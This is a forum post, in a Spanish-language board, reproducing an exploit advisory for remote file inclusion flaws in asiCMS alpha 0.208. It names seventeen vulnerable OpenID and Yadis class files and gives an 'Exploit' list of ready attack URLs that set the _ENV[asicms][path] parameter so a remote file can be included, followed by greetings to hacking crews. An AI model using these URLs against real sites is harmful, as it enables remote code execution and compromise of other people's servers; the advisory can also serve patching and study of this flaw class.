|
|
|||||||
 
|
|
|
LinkBack | Herramientas | Desplegado |
09-oct-2008, 11:35
|
#1 |
|
Guest
Mensajes: n/a
|
asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities
Código:
===========================================================================================
[o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability
Software : asiCMS version alpha 0.208
Vendor : [Solo usuarios registrados pueden ver los links. ]
Download : [Solo usuarios registrados pueden ver los links. ]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
===========================================================================================
[o] Vulnerable file
classes/Auth/OpenID/Association.php
classes/Auth/OpenID/BigMath.php
classes/Auth/OpenID/DiffieHellman.php
classes/Auth/OpenID/DumbStore.php
classes/Auth/OpenID/Extension.php
classes/Auth/OpenID/FileStore.php
classes/Auth/OpenID/HMAC.php
classes/Auth/OpenID/MemcachedStore.php
classes/Auth/OpenID/Message.php
classes/Auth/OpenID/Nonce.php
classes/Auth/OpenID/SQLStore.php
classes/Auth/OpenID/SReg.php
classes/Auth/OpenID/TrustRoot.php
classes/Auth/OpenID/URINorm.php
classes/Auth/Yadis/XRDS.php
classes/Auth/Yadis/XRI.php
classes/Auth/Yadis/XRIRes.php
All the file is affected by _ENV[asicms][path] variable
[o] Exploit
http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=
===========================================================================================
[o] Greetz
MainHack BrotherHood [ [Solo usuarios registrados pueden ver los links. ] ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke
===========================================================================================
|
|
|
| Herramientas | |
| Desplegado | |
|
|
Mode Lineal
